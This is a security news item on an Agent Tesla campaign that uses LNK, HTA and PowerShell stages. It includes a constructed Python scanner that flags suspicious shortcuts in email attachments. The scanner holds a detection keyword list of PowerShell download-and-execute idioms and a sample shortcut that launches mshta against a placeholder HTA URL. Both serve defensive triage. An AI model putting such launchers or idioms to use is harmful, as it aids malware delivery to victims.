Zscaler ThreatLabz researchers discovered that the Agent Tesla remote access trojan is being spread using Quantum Builder in a new malware campaign involving LNK files, The Hacker News reports.
The attack begins with spear-phishing emails purporting to be from a Chinese sugar supplier that carry a GZIP attachment; opening it eventually launches a remote HTML application, and the HTA file decrypts and executes a separate PowerShell script that then retrieves Agent Tesla, the report showed. A second variant of the infection sequence, which uses a ZIP rather than a GZIP file, was found to use more obfuscation techniques to conceal the malicious activity.
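The chain described above (archive attachment, LNK shortcut, HTA, PowerShell) leaves a simple artefact a mail gateway or sandbox can inspect before anything runs: the shortcut's own target and argument strings. The following is an added, defender-side example and is not code from Zscaler, The Hacker News or the campaign itself. It parses the fixed header and StringData section of a Windows shell link (the MS-SHLLINK layout), unpacks GZIP or ZIP containers to reach embedded `.lnk` files, and flags shortcuts whose path or arguments reference HTA or PowerShell launchers. The keyword list, the file names and the shortcut contents are constructed for the demonstration; the `example.invalid` URL is a placeholder, not an indicator from the report.

```python
import gzip
import io
import re
import struct
import zipfile

# LinkFlags bits (MS-SHLLINK 2.1.1) that control which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# Fixed CLSID every shell link carries in bytes 4..20 of the header.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# Constructed watch-list of launcher names and PowerShell idioms seen in LNK-to-HTA chains (assumption, not from the report).
SUSPICIOUS = re.compile(r"mshta|\.hta\b|powershell|pwsh|-enc\b|frombase64string|downloadstring|iex\b", re.I)

# StringData blocks appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def build_lnk(relative_path, arguments):
    """Assemble a minimal Unicode shell link (header + RELATIVE_PATH + COMMAND_LINE_ARGUMENTS) as a constructed sample."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    # HeaderSize, CLSID, LinkFlags, FileAttributes, 3 FILETIMEs, FileSize, IconIndex, ShowCommand(SW_SHOWNORMAL), HotKey, 3 reserved
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = b""
    for text in (relative_path, arguments):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


def parse_lnk(data):
    """Return the StringData fields of a shell link, skipping the optional IDList and LinkInfo structures."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", data, off)[0]      # IDListSize excludes its own 2 bytes
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", data, off)[0]          # LinkInfoSize includes its own 4 bytes
    unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            nbytes = count * 2 if unicode else count
            raw = data[off:off + nbytes]
            fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
            off += nbytes
    return fields


def assess_lnk(fields):
    """Return the sorted, lower-cased watch-list terms found in the shortcut's path/argument strings."""
    text = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments", "icon_location"))
    return sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(text)})


def scan_zip(zip_bytes):
    """Inspect every .lnk member of an in-memory ZIP; return (member name, hits) for flagged shortcuts."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(zf.read(info))
            except ValueError:
                continue
            hits = assess_lnk(fields)
            if hits:
                findings.append((info.filename, hits))
    return findings


def scan_attachment(name, blob):
    """Dispatch on container type by magic bytes: single-member GZIP, ZIP, or a bare shell link."""
    if blob[:2] == b"\x1f\x8b":
        inner_name = name[:-3] if name.lower().endswith(".gz") else name
        return scan_attachment(inner_name, gzip.decompress(blob))
    if blob[:2] == b"PK":
        return scan_zip(blob)
    if blob[:4] == b"\x4c\x00\x00\x00":
        hits = assess_lnk(parse_lnk(blob))
        return [(name, hits)] if hits else []
    return []


def sample_zip():
    """Constructed attachment: one shortcut pointing at mshta with an HTA argument, one benign shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice.pdf.lnk", build_lnk("..\\..\\Windows\\System32\\mshta.exe", "http://example.invalid/stage.hta"))
        zf.writestr("readme.lnk", build_lnk("..\\notes.txt", ""))
    return buf.getvalue()


if __name__ == "__main__":
    for name, hits in scan_attachment("order.zip", sample_zip()):
        print(f"{name}: suspicious shortcut ({', '.join(hits)})")
```

The parser deliberately stops at the StringData section: for triage, the target path and arguments are what matter, and skipping the IDList and LinkInfo blocks by their declared sizes avoids having to interpret them. A production gateway would also want to treat a double extension such as `Invoice.pdf.lnk` as its own signal and to record the parsed strings as detection evidence alongside the verdict.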
"Threat actors are continuously evolving their tactics and making use of malware builders sold on the cybercrime marketplace. This Agent Tesla campaign is the latest in a string of attacks in which Quantum Builder has been used to create malicious payloads in campaigns against various organizations," said researchers.